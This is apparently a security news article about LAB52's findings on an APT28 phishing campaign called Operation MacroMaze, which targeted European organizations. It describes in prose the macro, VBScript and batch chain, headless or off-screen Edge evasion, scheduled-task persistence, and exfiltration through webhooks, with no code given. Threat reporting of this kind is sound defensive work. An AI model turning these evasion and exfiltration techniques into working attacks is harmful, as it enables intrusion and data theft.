A Russian-linked state-sponsored threat actor known as APT28 has been named in a new campaign targeting certain organizations in Western and Central Europe.
The operation, according to S2 Grupo’s LAB52 threat intelligence team, was active between September 2025 and January 2026. Codenamed Operation MacroMaze. “The campaign relies on the use of basic tools and the exploitation of legitimate infrastructure services and data processing,” the cybersecurity company said.
Attack chains that use phishing emails as a starting point for distributing decoy documents contain a common structural element within their XML, a field called “INCLUDEPICTURE” that identifies a webhook.[.]the URL of the site that hosts the JPG image. This, in turn, causes the image file to be downloaded from the remote server when the document is opened.
Put differently, these devices act as beacons like a tracking pixel that triggers an outgoing HTTP request to a webhook.[.]the URL of the site when you open the document. The server user can enter metadata associated with the request, confirming that the document has actually been opened by the recipient.
LAB52 said it identified several documents with slightly modified macros between the end of September 2025 and January 2026, all of which work as a drop-in to find a place where the host is vulnerable and deliver additional payloads.
“Although the concept of all detected macros remains the same, the documents show a change in evasion techniques, from using a ‘headless’ browser in the old version to the use of keyboard emulation (SendKeys) in the new versions to bypass the security commands,” explains the Spanish cybersecurity company.
The macro is designed to execute a Visual Basic Script (VBScript) to move the infection to the next stage. The script, on the other hand, runs a CMD file to get persistence with scheduled tasks and launches a batch script to provide a small load of Base64-encoded HTML in Microsoft Edge in headless mode to escape detection, returning the command to the webhook.[.]destination, run it, capture it, and export it to another webhook[.]example site in the form of an HTML file.
A second variant of the batch script was found to avoid headless extraction in favor of removing the browser window from the screen, followed by aggressively terminating all other Edge browser processes to ensure a controlled environment.
“When the resulting HTML file is rendered by Microsoft Edge, the form is submitted, causing the compiled command to be issued to a remote webhook endpoint without user interaction,” LAB52 said. “This browser-based filtering method uses standard HTML functionality to transfer data while minimizing disk-based artifacts.”
“This campaign proves that simplicity can be powerful. The attacker uses very basic tools (batch files, small VBS launchers and simple HTML) but carefully orchestrates them to increase subtlety: Moving operations to hidden or off-screen browser sessions, cleaning artifacts, and outsourcing both payload delivery and data extraction to widely used webhook services.”
